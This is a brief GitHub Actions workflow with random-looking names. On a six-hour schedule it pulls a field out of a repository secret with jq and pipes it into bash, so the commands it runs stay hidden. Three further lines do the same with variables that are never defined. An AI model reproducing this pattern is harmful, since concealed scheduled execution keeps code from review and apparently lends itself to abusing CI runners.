name: fanyoujiang6472

on:
  workflow_dispatch:
  schedule:
    - cron: '2 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanyoujiang6472
        env:
          bajdl42: ${{ secrets.bajdl42 }}
        run: |
          echo $bajdl42 | jq -r .jnd971 | /bin/bash
          echo $d1 | jq -r .x400 | /bin/bash
          echo $fo07 | jq -r .v8370 | /bin/bash
          echo $n70 | jq -r .o28237 | /bin/bash

